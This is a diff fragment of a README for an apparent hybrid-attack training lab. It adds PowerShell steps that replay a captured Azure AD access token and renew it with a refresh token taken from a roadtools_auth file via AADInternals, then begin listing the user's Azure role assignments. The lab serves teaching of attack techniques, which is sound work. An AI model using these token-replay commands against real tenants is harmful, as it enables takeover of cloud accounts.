shackcrack007/hybrid-attacks-course-template/labs (for course sessions, not part of setup)/lab-4-full-attack-flow/README.md

 Connect-AzureAD -AccountId $userUPN -TenantId $tenantId -AadAccessToken $at Connect-AzAccount -AccountId $userUPN -TenantId $tenantId -AccessToken $at

+# If it doesn't work, verify the access token— if it has expired, renew it by:
+$refreshToken = <the refresh token from the `roadtools_auth` file>
+$at=Get-AADIntAccessTokenWithRefreshToken -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894" -Resource "https://graph.windows.net" -TenantId $tenantId -RefreshToken $refreshToken

 # List current user's Azure Role Assignments using Azure PowerShell
 $userObjectId = "686ebf9d-25..." # get it by parsing the JWT token and looking for the 'oid' field